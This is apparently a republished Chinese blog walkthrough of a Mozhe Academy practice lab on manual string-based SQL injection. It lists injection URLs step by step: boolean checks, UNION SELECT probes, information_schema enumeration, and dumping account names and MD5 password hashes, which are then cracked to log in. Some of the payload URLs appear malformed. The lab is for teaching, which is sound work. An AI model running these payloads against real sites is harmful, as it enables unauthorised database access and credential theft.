SQL手工注入漏洞测试(MySQL数据库-字符型)-墨者

2023-12-02 02:30

本文主要是介绍SQL手工注入漏洞测试(MySQL数据库-字符型)-墨者,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!


———靶场专栏———


声明:文章由作者weoptions学习或练习过程中的步骤及思路,非正式答案,仅供学习和参考。

靶场背景:

来源:

        墨者学院

简介:

        安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标:

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解MySQL的数据结构;
4.了解字符串的MD5加解密;

解题方向:

        手工进行SQL注入测试,获取管理密码登录。


解题思路:

        这是字符型注入,可能会涉及到注释字符,嗯~ o(* ̄▽ ̄*)o,MD5肯定就是MD5加密喽~

先找到注入点,再用语句尝试查询数据库信息,再用select查找我们所需要的管理员登陆信息。


解题步骤:

        

        一、找到注入点

靶场~启动!!!(我的三个币啊/(ㄒoㄒ)/~~)

.

这里有个停机维护的通知,我们点进去看一眼。

http://124.70.91.203:49986/new_list.php?id=tingjigonggao

找到了,id=tingjigonggao,这可能是一个注入点,尝试一下。

http://124.70.91.203:49986/new_list.php?id=tingjigonggao' and '1'='1

输入后页面正常显示,因为sql语序检查的是一个字符串,而字符串的表示为'text',用单引号括起来的。假如此网站sql语句为 (瞎写的,不知道对不对)

$id = $_GET 'id'

$SQL = select * from user where id = $id

那么原来输入的就是

$SQL =$_GET select * from user where 'tingjigonggao'

我们验证时输入的是

$SQL =$_GET select * from user where 'tingjigonggao' and '1'='1'

这时候正常显示,说明我们的注入语句是正确的,再尝试'tingjigonggao' and '1'='2',验证注入点到底是不是在这里。

http://124.70.91.203:49986/new_list.php?id=tingjigonggao' and '1'='2

OK,(机智.jpg)说明注入点就是在id = ' ' 这里。


        二、order by猜字段

有点繁琐,直接把最终url信息发出来了。

124.70.91.203:49986/new_list.php?id=?id=-1' union select 1,2,3,4'

order by 可以查询数据表的字段数量,一来可以找到有回显的字段,二来方便摸清正在访问的数据表中有几个列。

根据结果显示,正在访问的数据表有四个列,其中有第二列和第三列是有回显的。


        三、查询数据库信息

version()                                数据库版本

database()                        数据库名称

user()                                数据库用户

@@version_compile_os       操作系统

例:

124.70.91.203:49986/new_list.php?id=?id=-1' union select 1,version(),3,4'

我们拿到的信息为

数据库版本:10.2.15-MariaDB-log

数据库名称:mozhe_discuz_stormgroup

数据库用户:root@localhost

操作系统:Linux

可以看到是root账户,管理员账户,是有权限进行增删改查和其他操作的。嗯?我们题目不是mysql数据库吗?管他呢。可以理解为MariaDB是mysql的升级版(其实不是),向下兼容。


        四、查数据库表

MySQL高版本(5.0以上)都有一个称为information_schema的数据库,其中存放着数据库所有的表名和列名信息。我们去查查看一下。

124.70.91.203:49986/new_list.php?id=?id=-1' union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_discuz_stormgroup'--+

解析为,查 “表名” 来自“information_schema数据库下面的tables表” 限定为 数据库名=“mozhe_discuz_stormgroup”。后面的“--+”,“--”是注释后面的符号,“+”代表的是空格

我们再用group_concat()函数将所有都展示出来。

124.70.91.203:49986/new_list.php?id=?id=-1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_discuz_stormgroup'--+


        五、查询用户信息表

用户信息就在stormgroup_member(译为风暴组成员),notice(注意)里面是没有的,别问,问就是试过了。

开叉,呸~,开查!!!

124.70.91.203:49986/new_list.php?id=?id=-1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='stormgroup_member'--+

id,name,password,status

至此我们拿到的信息为mozhe_discuz_stormgroup数据库下面有个数据库表stormgroup_member下面有数据库列id,name,password,status。

接下来,我们就去mozhe_discuz_stormgroup数据库下的stormgroup_member表查name,和password就行了。


        六、查用户数据

url码为:

124.70.91.203:49986/new_list.php?id=?id=-1' union select 1,group_concat(name),group_concat(password),4 from stormgroup_member--+

拿到两个账号和密码

①mozhe,356f589a7df439f6f744ff19bb8092c0

②mozhe,a8eed3d6ee9831d950d5b4dc2e27e506

密码进行MD5解密后为

①mozhe,dsan13

②mozhe,437917

md5在线解密破解,md5解密加密


        

        七、登陆尝试

①mozhe,dsan13

②mozhe,437917

成功拿到key。


总结:

        难度:★★★☆☆☆☆☆☆☆

        解析:本身难度不是很高,但是手工注入容易出错(字母不好打对),熟练就好了。

        有需要工具的请私信。


这篇关于SQL手工注入漏洞测试(MySQL数据库-字符型)-墨者的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/443621

相关文章

慢sql提前分析预警和动态sql替换-Mybatis-SQL

《慢sql提前分析预警和动态sql替换-Mybatis-SQL》为防止慢SQL问题而开发的MyBatis组件,该组件能够在开发、测试阶段自动分析SQL语句,并在出现慢SQL问题时通过Ducc配置实现动... 目录背景解决思路开源方案调研设计方案详细设计使用方法1、引入依赖jar包2、配置组件XML3、核心配

MySQL数据库约束深入详解

《MySQL数据库约束深入详解》:本文主要介绍MySQL数据库约束,在MySQL数据库中,约束是用来限制进入表中的数据类型的一种技术,通过使用约束,可以确保数据的准确性、完整性和可靠性,需要的朋友... 目录一、数据库约束的概念二、约束类型三、NOT NULL 非空约束四、DEFAULT 默认值约束五、UN

MySQL 多表连接操作方法(INNER JOIN、LEFT JOIN、RIGHT JOIN、FULL OUTER JOIN)

《MySQL多表连接操作方法(INNERJOIN、LEFTJOIN、RIGHTJOIN、FULLOUTERJOIN)》多表连接是一种将两个或多个表中的数据组合在一起的SQL操作,通过连接,... 目录一、 什么是多表连接?二、 mysql 支持的连接类型三、 多表连接的语法四、实战示例 数据准备五、连接的性

解决IDEA报错:编码GBK的不可映射字符问题

《解决IDEA报错:编码GBK的不可映射字符问题》:本文主要介绍解决IDEA报错:编码GBK的不可映射字符问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录IDEA报错:编码GBK的不可映射字符终端软件问题描述原因分析解决方案方法1:将命令改为方法2:右下jav

MySQL中的分组和多表连接详解

《MySQL中的分组和多表连接详解》:本文主要介绍MySQL中的分组和多表连接的相关操作,本文通过实例代码给大家介绍的非常详细,感兴趣的朋友一起看看吧... 目录mysql中的分组和多表连接一、MySQL的分组(group javascriptby )二、多表连接(表连接会产生大量的数据垃圾)MySQL中的

MySQL 中的 JSON 查询案例详解

《MySQL中的JSON查询案例详解》:本文主要介绍MySQL的JSON查询的相关知识,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友参考下吧... 目录mysql 的 jsON 路径格式基本结构路径组件详解特殊语法元素实际示例简单路径复杂路径简写操作符注意MySQL 的 J

Windows 上如果忘记了 MySQL 密码 重置密码的两种方法

《Windows上如果忘记了MySQL密码重置密码的两种方法》:本文主要介绍Windows上如果忘记了MySQL密码重置密码的两种方法,本文通过两种方法结合实例代码给大家介绍的非常详细,感... 目录方法 1:以跳过权限验证模式启动 mysql 并重置密码方法 2:使用 my.ini 文件的临时配置在 Wi

MySQL重复数据处理的七种高效方法

《MySQL重复数据处理的七种高效方法》你是不是也曾遇到过这样的烦恼:明明系统测试时一切正常,上线后却频频出现重复数据,大批量导数据时,总有那么几条不听话的记录导致整个事务莫名回滚,今天,我就跟大家分... 目录1. 重复数据插入问题分析1.1 问题本质1.2 常见场景图2. 基础解决方案:使用异常捕获3.

SQL中redo log 刷⼊磁盘的常见方法

《SQL中redolog刷⼊磁盘的常见方法》本文主要介绍了SQL中redolog刷⼊磁盘的常见方法,将redolog刷入磁盘的方法确保了数据的持久性和一致性,下面就来具体介绍一下,感兴趣的可以了解... 目录Redo Log 刷入磁盘的方法Redo Log 刷入磁盘的过程代码示例(伪代码)在数据库系统中,r

mysql中的group by高级用法

《mysql中的groupby高级用法》MySQL中的GROUPBY是数据聚合分析的核心功能,主要用于将结果集按指定列分组,并结合聚合函数进行统计计算,下面给大家介绍mysql中的groupby用法... 目录一、基本语法与核心功能二、基础用法示例1. 单列分组统计2. 多列组合分组3. 与WHERE结合使